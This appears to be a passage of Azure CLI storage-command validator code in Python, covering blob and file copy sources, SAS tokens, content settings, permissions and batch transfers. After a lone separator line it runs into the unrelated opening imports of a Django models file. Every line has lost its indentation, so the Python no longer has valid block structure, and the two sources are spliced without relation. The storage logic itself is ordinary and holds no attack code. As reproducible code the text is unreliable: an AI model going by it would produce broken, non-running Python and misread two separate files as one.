blob = ns.pop('source_blob', None)
snapshot = ns.pop('source_snapshot', None)
# source as file
share = ns.pop('source_share', None)
path = ns.pop('source_path', None)
file_snapshot = ns.pop('file_snapshot', None)
# source credential clues
source_account_name = ns.pop('source_account_name', None)
source_account_key = ns.pop('source_account_key', None)
source_sas = ns.pop('source_sas', None)
# source in the form of an uri
uri = ns.get('copy_source', None)
if uri:
if any([container, blob, snapshot, share, path, file_snapshot, source_account_name,
source_account_key]):
raise ValueError(usage_string.format('Unused parameters are given in addition to the '
'source URI'))
if source_sas:
source_sas = source_sas.lstrip('?')
uri = '{}{}{}'.format(uri, '?', source_sas)
namespace.copy_source = uri
return
# ensure either a file or blob source is specified
valid_blob_source = container and blob and not share and not path and not file_snapshot
valid_file_source = share and path and not container and not blob and not snapshot
if not valid_blob_source and not valid_file_source:
raise ValueError(usage_string.format('Neither a valid blob or file source is specified'))
if valid_blob_source and valid_file_source:
raise ValueError(usage_string.format('Ambiguous parameters, both blob and file sources are '
'specified'))
validate_client_parameters(cmd, namespace) # must run first to resolve storage account
if not source_account_name:
if source_account_key:
raise ValueError(usage_string.format('Source account key is given but account name is not'))
# assume that user intends to copy blob in the same account
source_account_name = ns.get('account_name', None)
# determine if the copy will happen in the same storage account
same_account = False
if not source_account_key and not source_sas:
if source_account_name == ns.get('account_name', None):
same_account = True
source_account_key = ns.get('account_key', None)
source_sas = ns.get('sas_token', None)
else:
# the source account is different from destination account but the key is missing try to query one.
try:
source_account_key = _query_account_key(cmd.cli_ctx, source_account_name)
except ValueError:
raise ValueError('Source storage account {} not found.'.format(source_account_name))
# Both source account name and either key or sas (or both) are now available
if not source_sas:
# generate a sas token even in the same account when the source and destination are not the same kind.
if valid_file_source and (ns.get('container_name', None) or not same_account):
import os
dir_name, file_name = os.path.split(path) if path else (None, '')
source_sas = create_short_lived_file_sas(cmd, source_account_name, source_account_key, share,
dir_name, file_name)
elif valid_blob_source and (ns.get('share_name', None) or not same_account):
source_sas = create_short_lived_blob_sas(cmd, source_account_name, source_account_key, container, blob)
query_params = []
if source_sas:
query_params.append(source_sas.lstrip('?'))
if snapshot:
query_params.append('snapshot={}'.format(snapshot))
if file_snapshot:
query_params.append('sharesnapshot={}'.format(file_snapshot))
uri = 'https://{0}.{1}.{6}/{2}/{3}{4}{5}'.format(
source_account_name,
'blob' if valid_blob_source else 'file',
container if valid_blob_source else share,
encode_for_url(blob if valid_blob_source else path),
'?' if query_params else '',
'&'.join(query_params),
cmd.cli_ctx.cloud.suffixes.storage_endpoint)
namespace.copy_source = uri
def validate_blob_type(namespace):
if not namespace.blob_type:
namespace.blob_type = 'page' if namespace.file_path.endswith('.vhd') else 'block'
def validate_storage_data_plane_list(namespace):
if namespace.num_results == '*':
namespace.num_results = None
else:
namespace.num_results = int(namespace.num_results)
def get_content_setting_validator(settings_class, update, guess_from_file=None):
def _class_name(class_type):
return class_type.__module__ + "." + class_type.__class__.__name__
def validator(cmd, namespace):
t_base_blob_service, t_file_service, t_blob_content_settings, t_file_content_settings = cmd.get_models(
'blob.baseblobservice#BaseBlobService',
'file#FileService',
'blob.models#ContentSettings',
'file.models#ContentSettings')
# must run certain validators first for an update
if update:
validate_client_parameters(cmd, namespace)
if update and _class_name(settings_class) == _class_name(t_file_content_settings):
get_file_path_validator()(namespace)
ns = vars(namespace)
clear_content_settings = ns.pop('clear_content_settings', False)
# retrieve the existing object properties for an update
if update and not clear_content_settings:
account = ns.get('account_name')
key = ns.get('account_key')
cs = ns.get('connection_string')
sas = ns.get('sas_token')
token_credential = ns.get('token_credential')
if _class_name(settings_class) == _class_name(t_blob_content_settings):
client = get_storage_data_service_client(cmd.cli_ctx,
service=t_base_blob_service,
name=account,
key=key, connection_string=cs, sas_token=sas,
token_credential=token_credential)
container = ns.get('container_name')
blob = ns.get('blob_name')
lease_id = ns.get('lease_id')
props = client.get_blob_properties(container, blob, lease_id=lease_id).properties.content_settings
elif _class_name(settings_class) == _class_name(t_file_content_settings):
client = get_storage_data_service_client(cmd.cli_ctx, t_file_service, account, key, cs, sas)
share = ns.get('share_name')
directory = ns.get('directory_name')
filename = ns.get('file_name')
props = client.get_file_properties(share, directory, filename).properties.content_settings
# create new properties
new_props = settings_class(
content_type=ns.pop('content_type', None),
content_disposition=ns.pop('content_disposition', None),
content_encoding=ns.pop('content_encoding', None),
content_language=ns.pop('content_language', None),
content_md5=ns.pop('content_md5', None),
cache_control=ns.pop('content_cache_control', None)
)
# if update, fill in any None values with existing
if update:
if not clear_content_settings:
for attr in ['content_type', 'content_disposition', 'content_encoding', 'content_language',
'content_md5', 'cache_control']:
if getattr(new_props, attr) is None:
setattr(new_props, attr, getattr(props, attr))
else:
if guess_from_file:
new_props = guess_content_type(ns[guess_from_file], new_props, settings_class)
ns['content_settings'] = new_props
return validator
def validate_custom_domain(namespace):
if namespace.use_subdomain and not namespace.custom_domain:
raise ValueError('usage error: --custom-domain DOMAIN [--use-subdomain]')
def validate_encryption_services(cmd, namespace):
"""
Builds up the encryption services object for storage account operations based on the list of services passed in.
"""
if namespace.encryption_services:
t_encryption_services, t_encryption_service = get_sdk(cmd.cli_ctx, ResourceType.MGMT_STORAGE,
'EncryptionServices', 'EncryptionService', mod='models')
services = {service: t_encryption_service(enabled=True) for service in namespace.encryption_services}
namespace.encryption_services = t_encryption_services(**services)
def validate_encryption_source(namespace):
if namespace.encryption_key_source == 'Microsoft.Keyvault' and \
not (namespace.encryption_key_name and namespace.encryption_key_vault):
raise ValueError('--encryption-key-name and --encryption-key-vault are required '
'when --encryption-key-source=Microsoft.Keyvault is specified.')
if namespace.encryption_key_name or namespace.encryption_key_version is not None or namespace.encryption_key_vault:
if namespace.encryption_key_source and namespace.encryption_key_source != 'Microsoft.Keyvault':
raise ValueError('--encryption-key-name, --encryption-key-vault, and --encryption-key-version are not '
'applicable without Microsoft.Keyvault key-source.')
def validate_entity(namespace):
""" Converts a list of key value pairs into a dictionary. Ensures that required
RowKey and PartitionKey are converted to the correct case and included. """
values = dict(x.split('=', 1) for x in namespace.entity)
keys = values.keys()
for key in list(keys):
if key.lower() == 'rowkey':
val = values[key]
del values[key]
values['RowKey'] = val
elif key.lower() == 'partitionkey':
val = values[key]
del values[key]
values['PartitionKey'] = val
keys = values.keys()
missing_keys = 'RowKey ' if 'RowKey' not in keys else ''
missing_keys = '{}PartitionKey'.format(missing_keys) \
if 'PartitionKey' not in keys else missing_keys
if missing_keys:
raise argparse.ArgumentError(
None, 'incorrect usage: entity requires: {}'.format(missing_keys))
def cast_val(key, val):
""" Attempts to cast numeric values (except RowKey and PartitionKey) to numbers so they
can be queried correctly. """
if key in ['PartitionKey', 'RowKey']:
return val
def try_cast(to_type):
try:
return to_type(val)
except ValueError:
return None
return try_cast(int) or try_cast(float) or val
# ensure numbers are converted from strings so querying will work correctly
values = {key: cast_val(key, val) for key, val in values.items()}
namespace.entity = values
def validate_marker(namespace):
""" Converts a list of key value pairs into a dictionary. Ensures that required
nextrowkey and nextpartitionkey are included. """
if not namespace.marker:
return
marker = dict(x.split('=', 1) for x in namespace.marker)
expected_keys = {'nextrowkey', 'nextpartitionkey'}
for key in list(marker.keys()):
new_key = key.lower()
if new_key in expected_keys:
expected_keys.remove(key.lower())
val = marker[key]
del marker[key]
marker[new_key] = val
if expected_keys:
raise argparse.ArgumentError(
None, 'incorrect usage: marker requires: {}'.format(' '.join(expected_keys)))
namespace.marker = marker
def get_file_path_validator(default_file_param=None):
""" Creates a namespace validator that splits out 'path' into 'directory_name' and 'file_name'.
Allows another path-type parameter to be named which can supply a default filename. """
def validator(namespace):
import os
if not hasattr(namespace, 'path'):
return
path = namespace.path
dir_name, file_name = os.path.split(path) if path else (None, '')
if default_file_param and '.' not in file_name:
dir_name = path
file_name = os.path.split(getattr(namespace, default_file_param))[1]
dir_name = None if dir_name in ('', '.') else dir_name
namespace.directory_name = dir_name
namespace.file_name = file_name
del namespace.path
return validator
def validate_included_datasets(cmd, namespace):
if namespace.include:
include = namespace.include
if set(include) - set('cmsd'):
help_string = '(c)opy-info (m)etadata (s)napshots (d)eleted'
raise ValueError('valid values are {} or a combination thereof.'.format(help_string))
t_blob_include = cmd.get_models('blob#Include')
namespace.include = t_blob_include('s' in include, 'm' in include, False, 'c' in include, 'd' in include)
def validate_key_name(namespace):
key_options = {'primary': '1', 'secondary': '2'}
if hasattr(namespace, 'key_type') and namespace.key_type:
namespace.key_name = namespace.key_type + key_options[namespace.key_name]
else:
namespace.key_name = storage_account_key_options[namespace.key_name]
if hasattr(namespace, 'key_type'):
del namespace.key_type
def validate_metadata(namespace):
if namespace.metadata:
namespace.metadata = dict(x.split('=', 1) for x in namespace.metadata)
def get_permission_help_string(permission_class):
allowed_values = [x.lower() for x in dir(permission_class) if not x.startswith('__')]
return ' '.join(['({}){}'.format(x[0], x[1:]) for x in allowed_values])
def get_permission_validator(permission_class):
allowed_values = [x.lower() for x in dir(permission_class) if not x.startswith('__')]
allowed_string = ''.join(x[0] for x in allowed_values)
def validator(namespace):
if namespace.permission:
if set(namespace.permission) - set(allowed_string):
help_string = get_permission_help_string(permission_class)
raise ValueError(
'valid values are {} or a combination thereof.'.format(help_string))
namespace.permission = permission_class(_str=namespace.permission)
return validator
def table_permission_validator(cmd, namespace):
""" A special case for table because the SDK associates the QUERY permission with 'r' """
t_table_permissions = get_table_data_type(cmd.cli_ctx, 'table', 'TablePermissions')
if namespace.permission:
if set(namespace.permission) - set('raud'):
help_string = '(r)ead/query (a)dd (u)pdate (d)elete'
raise ValueError('valid values are {} or a combination thereof.'.format(help_string))
namespace.permission = t_table_permissions(_str=namespace.permission)
def validate_container_public_access(cmd, namespace):
from .sdkutil import get_container_access_type
t_base_blob_svc = cmd.get_models('blob.baseblobservice#BaseBlobService')
if namespace.public_access:
namespace.public_access = get_container_access_type(cmd.cli_ctx, namespace.public_access.lower())
if hasattr(namespace, 'signed_identifiers'):
# must retrieve the existing ACL to simulate a patch operation because these calls
# are needlessly conflated
ns = vars(namespace)
validate_client_parameters(cmd, namespace)
account = ns.get('account_name')
key = ns.get('account_key')
cs = ns.get('connection_string')
sas = ns.get('sas_token')
client = get_storage_data_service_client(cmd.cli_ctx, t_base_blob_svc, account, key, cs, sas)
container = ns.get('container_name')
lease_id = ns.get('lease_id')
ns['signed_identifiers'] = client.get_container_acl(container, lease_id=lease_id)
def validate_fs_public_access(cmd, namespace):
from .sdkutil import get_fs_access_type
if namespace.public_access:
namespace.public_access = get_fs_access_type(cmd.cli_ctx, namespace.public_access.lower())
def validate_select(namespace):
if namespace.select:
namespace.select = ','.join(namespace.select)
# pylint: disable=too-many-statements
def get_source_file_or_blob_service_client(cmd, namespace):
"""
Create the second file service or blob service client for batch copy command, which is used to
list the source files or blobs. If both the source account and source URI are omitted, it
indicates that user want to copy files or blobs in the same storage account, therefore the
destination client will be set None hence the command will use destination client.
"""
t_file_svc, t_block_blob_svc = cmd.get_models('file#FileService', 'blob.blockblobservice#BlockBlobService')
usage_string = 'invalid usage: supply only one of the following argument sets:' + \
'\n\t --source-uri [--source-sas]' + \
'\n\tOR --source-container' + \
'\n\tOR --source-container --source-account-name --source-account-key' + \
'\n\tOR --source-container --source-account-name --source-sas' + \
'\n\tOR --source-share --source-account-name --source-account-key' + \
'\n\tOR --source-share --source-account-name --source-account-sas'
ns = vars(namespace)
source_account = ns.pop('source_account_name', None)
source_key = ns.pop('source_account_key', None)
source_uri = ns.pop('source_uri', None)
source_sas = ns.get('source_sas', None)
source_container = ns.get('source_container', None)
source_share = ns.get('source_share', None)
if source_uri and source_account:
raise ValueError(usage_string)
if not source_uri and bool(source_container) == bool(source_share): # must be container or share
raise ValueError(usage_string)
if (not source_account) and (not source_uri):
# Set the source_client to None if neither source_account or source_uri is given. This
# indicates the command that the source files share or blob container is in the same storage
# account as the destination file share or blob container.
#
# The command itself should create the source service client since the validator can't
# access the destination client through the namespace.
#
# A few arguments check will be made as well so as not to cause ambiguity.
if source_key or source_sas:
raise ValueError('invalid usage: --source-account-name is missing; the source account is assumed to be the'
' same as the destination account. Do not provide --source-sas or --source-account-key')
ns['source_client'] = None
if 'token_credential' not in ns: # not using oauth
return
# oauth is only possible through destination, must still get source creds
source_account, source_key, source_sas = ns['account_name'], ns['account_key'], ns['sas_token']
if source_account:
if not (source_key or source_sas):
# when neither storage account key or SAS is given, try to fetch the key in the current
# subscription
source_key = _query_account_key(cmd.cli_ctx, source_account)
if source_container:
ns['source_client'] = get_storage_data_service_client(
cmd.cli_ctx, t_block_blob_svc, name=source_account, key=source_key, sas_token=source_sas)
elif source_share:
ns['source_client'] = get_storage_data_service_client(
cmd.cli_ctx, t_file_svc, name=source_account, key=source_key, sas_token=source_sas)
elif source_uri:
if source_key or source_container or source_share:
raise ValueError(usage_string)
from .storage_url_helpers import StorageResourceIdentifier
if source_sas:
source_uri = '{}{}{}'.format(source_uri, '?', source_sas.lstrip('?'))
identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, source_uri)
nor_container_or_share = not identifier.container and not identifier.share
if not identifier.is_url():
raise ValueError('incorrect usage: --source-uri expects a URI')
if identifier.blob or identifier.directory or identifier.filename or nor_container_or_share:
raise ValueError('incorrect usage: --source-uri has to be blob container or file share')
if identifier.sas_token:
ns['source_sas'] = identifier.sas_token
else:
source_key = _query_account_key(cmd.cli_ctx, identifier.account_name)
if identifier.container:
ns['source_container'] = identifier.container
if identifier.account_name != ns.get('account_name'):
ns['source_client'] = get_storage_data_service_client(
cmd.cli_ctx, t_block_blob_svc, name=identifier.account_name, key=source_key,
sas_token=identifier.sas_token)
elif identifier.share:
ns['source_share'] = identifier.share
if identifier.account_name != ns.get('account_name'):
ns['source_client'] = get_storage_data_service_client(
cmd.cli_ctx, t_file_svc, name=identifier.account_name, key=source_key,
sas_token=identifier.sas_token)
def add_progress_callback(cmd, namespace):
def _update_progress(current, total):
message = getattr(_update_progress, 'message', 'Alive')
reuse = getattr(_update_progress, 'reuse', False)
if total:
hook.add(message=message, value=current, total_val=total)
if total == current and not reuse:
hook.end()
hook = cmd.cli_ctx.get_progress_controller(det=True)
_update_progress.hook = hook
if not namespace.no_progress:
namespace.progress_callback = _update_progress
del namespace.no_progress
def process_container_delete_parameters(cmd, namespace):
"""Process the parameters for storage container delete command"""
# check whether to use mgmt or data-plane
if namespace.bypass_immutability_policy:
# use management-plane
namespace.processed_account_name = namespace.account_name
namespace.processed_resource_group, namespace.mgmt_client = _query_account_rg(
cmd.cli_ctx, namespace.account_name)
del namespace.auth_mode
else:
# use data-plane, like before
validate_client_parameters(cmd, namespace)
def process_blob_download_batch_parameters(cmd, namespace):
"""Process the parameters for storage blob download command"""
import os
# 1. quick check
if not os.path.exists(namespace.destination) or not os.path.isdir(namespace.destination):
raise ValueError('incorrect usage: destination must be an existing directory')
# 2. try to extract account name and container name from source string
_process_blob_batch_container_parameters(cmd, namespace)
# 3. Call validators
add_progress_callback(cmd, namespace)
def process_blob_upload_batch_parameters(cmd, namespace):
"""Process the source and destination of storage blob upload command"""
import os
# 1. quick check
if not os.path.exists(namespace.source) or not os.path.isdir(namespace.source):
raise ValueError('incorrect usage: source must be an existing directory')
# 2. try to extract account name and container name from destination string
_process_blob_batch_container_parameters(cmd, namespace, source=False)
# 3. collect the files to be uploaded
namespace.source = os.path.realpath(namespace.source)
namespace.source_files = list(glob_files_locally(namespace.source, namespace.pattern))
# 4. determine blob type
if namespace.blob_type is None:
vhd_files = [f for f in namespace.source_files if f[0].endswith('.vhd')]
if any(vhd_files) and len(vhd_files) == len(namespace.source_files):
# when all the listed files are vhd files use page
namespace.blob_type = 'page'
elif any(vhd_files):
# source files contain vhd files but not all of them
raise CLIError("""Fail to guess the required blob type. Type of the files to be
uploaded are not consistent. Default blob type for .vhd files is "page", while
others are "block". You can solve this problem by either explicitly set the blob
type or ensure the pattern matches a correct set of files.""")
else:
namespace.blob_type = 'block'
# 5. call other validators
validate_metadata(namespace)
t_blob_content_settings = cmd.loader.get_sdk('blob.models#ContentSettings')
get_content_setting_validator(t_blob_content_settings, update=False)(cmd, namespace)
add_progress_callback(cmd, namespace)
def process_blob_delete_batch_parameters(cmd, namespace):
_process_blob_batch_container_parameters(cmd, namespace)
def _process_blob_batch_container_parameters(cmd, namespace, source=True):
"""Process the container parameters for storage blob batch commands before populating args from environment."""
if source:
container_arg, container_name_arg = 'source', 'source_container_name'
else:
# destination
container_arg, container_name_arg = 'destination', 'destination_container_name'
# try to extract account name and container name from source string
from .storage_url_helpers import StorageResourceIdentifier
container_arg_val = getattr(namespace, container_arg) # either a url or name
identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, container_arg_val)
if not identifier.is_url():
setattr(namespace, container_name_arg, container_arg_val)
elif identifier.blob:
raise ValueError('incorrect usage: {} should be either a container URL or name'.format(container_arg))
else:
setattr(namespace, container_name_arg, identifier.container)
if namespace.account_name is None:
namespace.account_name = identifier.account_name
elif namespace.account_name != identifier.account_name:
raise ValueError('The given storage account name is not consistent with the '
'account name in the destination URL')
# if no sas-token is given and the container url contains one, use it
if not namespace.sas_token and identifier.sas_token:
namespace.sas_token = identifier.sas_token
# Finally, grab missing storage connection parameters from environment variables
validate_client_parameters(cmd, namespace)
def process_file_upload_batch_parameters(cmd, namespace):
"""Process the parameters of storage file batch upload command"""
import os
# 1. quick check
if not os.path.exists(namespace.source):
raise ValueError('incorrect usage: source {} does not exist'.format(namespace.source))
if not os.path.isdir(namespace.source):
raise ValueError('incorrect usage: source must be a directory')
# 2. try to extract account name and container name from destination string
from .storage_url_helpers import StorageResourceIdentifier
identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, namespace.destination)
if identifier.is_url():
if identifier.filename or identifier.directory:
raise ValueError('incorrect usage: destination must be a file share url')
namespace.destination = identifier.share
if not namespace.account_name:
namespace.account_name = identifier.account_name
namespace.source = os.path.realpath(namespace.source)
def process_file_download_batch_parameters(cmd, namespace):
"""Process the parameters for storage file batch download command"""
import os
# 1. quick check
if not os.path.exists(namespace.destination) or not os.path.isdir(namespace.destination):
raise ValueError('incorrect usage: destination must be an existing directory')
# 2. try to extract account name and share name from source string
process_file_batch_source_parameters(cmd, namespace)
def process_file_batch_source_parameters(cmd, namespace):
from .storage_url_helpers import StorageResourceIdentifier
identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, namespace.source)
if identifier.is_url():
if identifier.filename or identifier.directory:
raise ValueError('incorrect usage: source should be either share URL or name')
namespace.source = identifier.share
if not namespace.account_name:
namespace.account_name = identifier.account_name
def process_file_download_namespace(namespace):
import os
get_file_path_validator()(namespace)
dest = namespace.file_path
if not dest or os.path.isdir(dest):
namespace.file_path = os.path.join(dest, namespace.file_name) \
if dest else namespace.file_name
def process_metric_update_namespace(namespace):
namespace.hour = namespace.hour == 'true'
namespace.minute = namespace.minute == 'true'
namespace.api = namespace.api == 'true' if namespace.api else None
if namespace.hour is None and namespace.minute is None:
raise argparse.ArgumentError(
None, 'incorrect usage: must specify --hour and/or --minute')
if (namespace.hour or namespace.minute) and namespace.api is None:
raise argparse.ArgumentError(
None, 'incorrect usage: specify --api when hour or minute metrics are enabled')
def validate_subnet(cmd, namespace):
from msrestazure.tools import resource_id, is_valid_resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
subnet = namespace.subnet
subnet_is_id = is_valid_resource_id(subnet)
vnet = namespace.vnet_name
if (subnet_is_id and not vnet) or (not subnet and not vnet):
return
if subnet and not subnet_is_id and vnet:
namespace.subnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=namespace.resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet,
child_type_1='subnets',
child_name_1=subnet)
else:
raise CLIError('incorrect usage: [--subnet ID | --subnet NAME --vnet-name NAME]')
def get_datetime_type(to_string):
""" Validates UTC datetime. Examples of accepted forms:
2017-12-31T01:11:59Z,2017-12-31T01:11Z or 2017-12-31T01Z or 2017-12-31 """
from datetime import datetime
def datetime_type(string):
""" Validates UTC datetime. Examples of accepted forms:
2017-12-31T01:11:59Z,2017-12-31T01:11Z or 2017-12-31T01Z or 2017-12-31 """
accepted_date_formats = ['%Y-%m-%dT%H:%M:%SZ', '%Y-%m-%dT%H:%MZ',
'%Y-%m-%dT%HZ', '%Y-%m-%d']
for form in accepted_date_formats:
try:
if to_string:
return datetime.strptime(string, form).strftime(form)
return datetime.strptime(string, form)
except ValueError:
continue
raise ValueError("Input '{}' not valid. Valid example: 2000-12-31T12:59:59Z".format(string))
return datetime_type
def ipv4_range_type(string):
""" Validates an IPv4 address or address range. """
import re
ip_format = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
if not re.match("^{}$".format(ip_format), string):
if not re.match("^{ip_format}-{ip_format}$".format(ip_format=ip_format), string):
raise ValueError
return string
def resource_type_type(loader):
""" Returns a function which validates that resource types string contains only a combination of service,
container, and object. Their shorthand representations are s, c, and o. """
def impl(string):
t_resources = loader.get_models('common.models#ResourceTypes')
if set(string) - set("sco"):
raise ValueError
return t_resources(_str=''.join(set(string)))
return impl
def services_type(loader):
""" Returns a function which validates that services string contains only a combination of blob, queue, table,
and file. Their shorthand representations are b, q, t, and f. """
def impl(string):
t_services = loader.get_models('common.models#Services')
if set(string) - set("bqtf"):
raise ValueError
return t_services(_str=''.join(set(string)))
return impl
def get_char_options_validator(types, property_name):
def _validator(namespace):
service_types = set(getattr(namespace, property_name, []))
if not service_types:
raise ValueError('Missing options --{}.'.format(property_name.replace('_', '-')))
if service_types - set(types):
raise ValueError(
'--{}: only valid values are: {}.'.format(property_name.replace('_', '-'), ', '.join(types)))
setattr(namespace, property_name, service_types)
return _validator
def page_blob_tier_validator(cmd, namespace):
if not namespace.tier:
return
if namespace.blob_type != 'page' and namespace.tier:
raise ValueError('Blob tier is only applicable to page blobs on premium storage accounts.')
try:
namespace.tier = getattr(cmd.get_models('blob.models#PremiumPageBlobTier'), namespace.tier)
except AttributeError:
from azure.cli.command_modules.storage.sdkutil import get_blob_tier_names
raise ValueError('Unknown premium page blob tier name. Choose among {}'.format(', '.join(
get_blob_tier_names(cmd.cli_ctx, 'PremiumPageBlobTier'))))
def block_blob_tier_validator(cmd, namespace):
if not namespace.tier:
return
if namespace.blob_type != 'block' and namespace.tier:
raise ValueError('Blob tier is only applicable to block blobs on standard storage accounts.')
try:
namespace.tier = getattr(cmd.get_models('blob.models#StandardBlobTier'), namespace.tier)
except AttributeError:
from azure.cli.command_modules.storage.sdkutil import get_blob_tier_names
raise ValueError('Unknown block blob tier name. Choose among {}'.format(', '.join(
get_blob_tier_names(cmd.cli_ctx, 'StandardBlobTier'))))
def blob_tier_validator(cmd, namespace):
if namespace.blob_type == 'page':
page_blob_tier_validator(cmd, namespace)
elif namespace.blob_type == 'block':
block_blob_tier_validator(cmd, namespace)
else:
raise ValueError('Blob tier is only applicable to block or page blob.')
def blob_rehydrate_priority_validator(namespace):
if namespace.blob_type == 'page' and namespace.rehydrate_priority:
raise ValueError('--rehydrate-priority is only applicable to block blob.')
if namespace.tier == 'Archive' and namespace.rehydrate_priority:
raise ValueError('--rehydrate-priority is only applicable to rehydrate blob data from the archive tier.')
if namespace.rehydrate_priority is None:
namespace.rehydrate_priority = 'Standard'
def validate_azcopy_upload_destination_url(cmd, namespace):
client = blob_data_service_factory(cmd.cli_ctx, {
'account_name': namespace.account_name, 'connection_string': namespace.connection_string})
destination_path = namespace.destination_path
if not destination_path:
destination_path = ''
url = client.make_blob_url(namespace.destination_container, destination_path)
namespace.destination = url
del namespace.destination_container
del namespace.destination_path
def validate_azcopy_remove_arguments(cmd, namespace):
usage_string = \
'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
'\n\t --container-name [--name]' \
'\n\tOR --share-name [--path]'
ns = vars(namespace)
# source as blob
container = ns.pop('container_name', None)
blob = ns.pop('blob_name', None)
# source as file
share = ns.pop('share_name', None)
path = ns.pop('path', None)
# ensure either a file or blob source is specified
valid_blob = container and not share
valid_file = share and not container
if not valid_blob and not valid_file:
raise ValueError(usage_string.format('Neither a valid blob or file source is specified'))
if valid_blob and valid_file:
raise ValueError(usage_string.format('Ambiguous parameters, both blob and file sources are '
'specified'))
if valid_blob:
client = blob_data_service_factory(cmd.cli_ctx, {
'account_name': namespace.account_name})
if not blob:
blob = ''
url = client.make_blob_url(container, blob)
namespace.service = 'blob'
namespace.target = url
if valid_file:
import os
client = file_data_service_factory(cmd.cli_ctx, {
'account_name': namespace.account_name,
'account_key': namespace.account_key})
dir_name, file_name = os.path.split(path) if path else (None, '')
dir_name = None if dir_name in ('', '.') else dir_name
url = client.make_file_url(share, dir_name, file_name)
namespace.service = 'file'
namespace.target = url
def as_user_validator(namespace):
if hasattr(namespace, 'token_credential') and not namespace.as_user:
raise CLIError('incorrect usage: specify --as-user when --auth-mode login is used to get user delegation key.')
if namespace.as_user:
if namespace.expiry is None:
raise argparse.ArgumentError(
None, 'incorrect usage: specify --expiry when as-user is enabled')
expiry = get_datetime_type(False)(namespace.expiry)
from datetime import datetime, timedelta
if expiry > datetime.utcnow() + timedelta(days=7):
raise argparse.ArgumentError(
None, 'incorrect usage: --expiry should be within 7 days from now')
if ((not hasattr(namespace, 'token_credential') or namespace.token_credential is None) and
(not hasattr(namespace, 'auth_mode') or namespace.auth_mode != 'login')):
raise argparse.ArgumentError(
None, "incorrect usage: specify '--auth-mode login' when as-user is enabled")
def validator_delete_retention_days(namespace):
if namespace.enable_delete_retention is True and namespace.delete_retention_days is None:
raise ValueError(
"incorrect usage: you have to provide value for '--delete-retention-days' when '--enable-delete-retention' "
"is set to true")
if namespace.enable_delete_retention is False and namespace.delete_retention_days is not None:
raise ValueError(
"incorrect usage: '--delete-retention-days' is invalid when '--enable-delete-retention' is set to false")
if namespace.enable_delete_retention is None and namespace.delete_retention_days is not None:
raise ValueError(
"incorrect usage: please specify '--enable-delete-retention true' if you want to set the value for "
"'--delete-retention-days'")
if namespace.delete_retention_days or namespace.delete_retention_days == 0:
if namespace.delete_retention_days < 1:
raise ValueError(
"incorrect usage: '--delete-retention-days' must be greater than or equal to 1")
if namespace.delete_retention_days > 365:
raise ValueError(
"incorrect usage: '--delete-retention-days' must be less than or equal to 365")
def validate_delete_retention_days(namespace):
if namespace.enable_delete_retention is True and namespace.delete_retention_days is None:
raise ValueError(
"incorrect usage: you have to provide value for '--delete-retention-days' when '--enable-delete-retention' "
"is set to true")
if namespace.enable_delete_retention is False and namespace.delete_retention_days is not None:
raise ValueError(
"incorrect usage: '--delete-retention-days' is invalid when '--enable-delete-retention' is set to false")
# pylint: disable=too-few-public-methods
class BlobRangeAddAction(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
if not namespace.blob_ranges:
namespace.blob_ranges = []
if isinstance(values, list):
values = ' '.join(values)
BlobRange = namespace._cmd.get_models('BlobRestoreRange', resource_type=ResourceType.MGMT_STORAGE)
try:
start_range, end_range = values.split(' ')
except (ValueError, TypeError):
raise CLIError('usage error: --blob-range VARIABLE OPERATOR VALUE')
namespace.blob_ranges.append(BlobRange(
start_range=start_range,
end_range=end_range
))
def validate_private_endpoint_connection_id(cmd, namespace):
if namespace.connection_id:
from azure.cli.core.util import parse_proxy_resource_id
result = parse_proxy_resource_id(namespace.connection_id)
namespace.resource_group_name = result['resource_group']
namespace.account_name = result['name']
namespace.private_endpoint_connection_name = result['child_name_1']
if namespace.account_name and not namespace.resource_group_name:
namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
if not all([namespace.account_name, namespace.resource_group_name, namespace.private_endpoint_connection_name]):
raise CLIError('incorrect usage: [--id ID | --name NAME --account-name NAME]')
del namespace.connection_id
def pop_data_client_auth(ns):
del ns.auth_mode
del ns.account_key
del ns.connection_string
del ns.sas_token
def validate_client_auth_parameter(cmd, ns):
from .sdkutil import get_container_access_type
if ns.public_access:
ns.public_access = get_container_access_type(cmd.cli_ctx, ns.public_access.lower())
if ns.default_encryption_scope and ns.prevent_encryption_scope_override is not None:
# simply try to retrieve the remaining variables from environment variables
if not ns.account_name:
ns.account_name = get_config_value(cmd, 'storage', 'account', None)
if ns.account_name and not ns.resource_group_name:
ns.resource_group_name = _query_account_rg(cmd.cli_ctx, account_name=ns.account_name)[0]
pop_data_client_auth(ns)
elif (ns.default_encryption_scope and ns.prevent_encryption_scope_override is None) or \
(not ns.default_encryption_scope and ns.prevent_encryption_scope_override is not None):
raise CLIError("usage error: You need to specify both --default-encryption-scope and "
"--prevent-encryption-scope-override to set encryption scope information "
"when creating container.")
else:
validate_client_parameters(cmd, ns)
def validate_encryption_scope_client_params(ns):
if ns.encryption_scope:
# will use track2 client and socket_timeout is unused
del ns.socket_timeout
def validate_access_control(namespace):
if namespace.acl and namespace.permissions:
raise CLIError('usage error: invalid when specifying both --acl and --permissions.')
def validate_service_type(services, service_type):
if service_type == 'table':
return 't' in services
if service_type == 'blob':
return 'b' in services
if service_type == 'queue':
return 'q' in services
def validate_logging_version(namespace):
if validate_service_type(namespace.services, 'table') and namespace.version != 1.0:
raise CLIError(
'incorrect usage: for table service, the supported version for logging is `1.0`. For more information, '
'please refer to https://docs.microsoft.com/rest/api/storageservices/storage-analytics-log-format.')
|
|
# -*- coding: utf-8 -*-
# Polymorphisme with DJANGO:
# + http://stackoverflow.com/questions/1397537/polymorphism-in-django
# + http://stackoverflow.com/questions/929029/how-do-i-access-the-child-classes-of-an-object-in-django-without-knowing-the-nam/929982#929982
import os
import re
import sys
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.db.models.signals import pre_delete, post_save
from django.dispatch import receiver
from django.core.urlresolvers import reverse
